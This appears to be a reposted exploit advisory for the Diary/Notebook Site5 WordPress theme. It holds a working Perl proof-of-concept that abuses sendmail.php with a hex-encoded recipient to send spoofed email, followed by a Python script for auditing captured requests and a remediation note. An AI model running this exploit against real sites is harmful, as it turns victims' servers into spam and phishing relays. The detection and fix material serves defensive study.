Diary/Notebook is a personal diary blog theme for WordPress designed by Site5. An e-mail spoofing vulnerability was recently found in it. The Perl exploit script is attached:
#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 WordPress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not documented
# Tested on: Linux 3.2
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };
# Change this to the root of the WordPress
my $wordpress = 'http://localhost/wordpress/';
my $url = $wordpress . 'wp-content/themes/diary/sendmail.php';
# Name shows up in the topic of the email (Website contact message from name)
my $name = 'proof of concept';
# Sender email address
my $email = 'sender@mail.com';
# Content of the email
my $comment = 'email content';
# Receiver email address
my $receiver = 'receiver@mail.com';
# Hex-encode each character of the receiver address
$receiver =~ s/(.)/sprintf("%x", ord($1))/eg;
my $ua = LWP::UserAgent->new();
my $request = POST($url, [name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit',]);
print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";
Author Niu x ADMA
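For site owners reviewing captured requests to this endpoint, the following added example (not part of the original post or the exploit author's code) decodes the hex-encoded recipient field the script sends and flags any address other than the site's own. The field name `receiver`, the allowlisted address and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ALLOWED_RECIPIENTS = {"owner@example.org"}  # assumption: the site's own contact address
RECIPIENT_FIELD = "receiver"                # assumption: name of the hex-encoded form field
HEX_PAIRS = re.compile(r"(?:[0-9a-fA-F]{2})+")


def encode_like_script(address):
    """Mirror the script's per-character sprintf("%x", ord) encoding."""
    return "".join("%x" % ord(ch) for ch in address)


def decode_recipient(value):
    """Decode two hex digits per character; None if the value is not well formed."""
    if not HEX_PAIRS.fullmatch(value):
        return None
    try:
        return bytes.fromhex(value).decode("ascii")
    except UnicodeDecodeError:
        return None


def audit_body(body):
    """Classify one urlencoded POST body sent to sendmail.php."""
    values = parse_qs(body, keep_blank_values=True).get(RECIPIENT_FIELD, [])
    if not values:
        return ("no-recipient-field", None)
    if len(values) > 1:
        return ("duplicate-recipient-field", None)
    decoded = decode_recipient(values[0])
    if decoded is None:
        return ("malformed-recipient", None)
    # Control characters have no place in a recipient address.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return ("control-characters", decoded)
    if decoded.lower() not in ALLOWED_RECIPIENTS:
        return ("foreign-recipient", decoded)
    return ("ok", decoded)


def sample_body(recipient_hex):
    """Build a constructed sample body (not real traffic)."""
    return "name=n&email=s%40example.org&comment=c&receiver=" + recipient_hex + "&submit=submit"


if __name__ == "__main__":
    for addr in ("owner@example.org", "someone@example.net"):
        print(audit_body(sample_body(encode_like_script(addr))))
    print(audit_body(sample_body("zz")))
```

The durable fix is for sendmail.php to take the recipient from server-side configuration and ignore any address supplied in the request.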